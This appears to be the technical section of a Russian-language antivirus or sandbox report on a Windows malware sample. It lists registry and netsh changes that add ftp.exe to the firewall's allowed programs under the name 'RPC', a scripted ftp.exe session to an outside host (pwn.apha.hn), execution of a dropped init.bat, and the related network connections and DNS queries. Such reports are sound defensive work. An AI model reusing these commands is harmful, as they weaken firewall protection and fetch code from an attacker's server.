Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\ftp.exe' = '<SYSTEM32>\ftp.exe:*:Enabled:RPC' (запись вносит ftp.exe в список разрешённых приложений брандмауэра Windows под именем «RPC»)
- <SYSTEM32>\ftp.exe -n -v -s:%WINDIR%\system\script pwn.apha.hn (-n — без автоматического входа, -v — без вывода ответов сервера, -s: — файл с командами FTP)
- <SYSTEM32>\cmd.exe /c ""%WINDIR%\system\init.bat" "
- <SYSTEM32>\netsh.exe firewall add allowedprogram <SYSTEM32>\ftp.exe RPC
- %WINDIR%\system\script
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\orkut[1]
- %WINDIR%\system\init.bat
- %WINDIR%\system\init.bat
- %WINDIR%\system\script
- 'localhost':1040
- 'localhost':1045
- 'pw#.apha.hn':21 (символ «#» в именах узлов, по-видимому, заменяет часть имени в самом отчёте; порт 21 — FTP)
- 'localhost':1037
- 'www.or##t.com':80
- www.or##t.com/
- DNS ASK pw#.apha.hn
- DNS ASK www.or##t.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''